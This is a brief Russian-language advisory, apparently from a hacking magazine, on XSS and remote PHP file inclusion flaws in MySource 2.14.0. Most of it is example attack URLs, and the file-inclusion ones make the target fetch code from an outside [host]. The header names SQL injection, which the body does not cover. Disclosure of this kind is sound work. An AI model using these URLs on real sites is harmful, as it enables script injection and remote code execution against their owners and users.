Xakep #305. Многошаговые SQL-инъекции
Программа: MySource 2.14.0
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей и выполнить произвольный PHP сценарий на целевой системе.
1. Межсайтовый скриптинг возможет из-за недостаточной обработки входных данных перед отображением их в браузере пользователей. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[victim]/web/edit/upgrade_in_progress_ backend.php?target_url=">[code]
http://[victim]/squizlib/bodycopy/pop_ups/ insert_table.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/ edit_table_cell_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/ header.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/ edit_table_row_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/ edit_table_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/
edit_table_cell_type_wysiwyg.php?stylesheet=">[code]
2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе.
Примеры:
http://[victim]/web/edit/upgrade_functions/new_upgrade
_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade
_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php? INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php? PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php? PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?PEAR_ PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?PEAR_ PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?PEAR_ PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode. php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php? PEAR_PATH=http://[host]/[file]?
Для удачной эксплуатации уязвимостей должна быть включена опция register_globals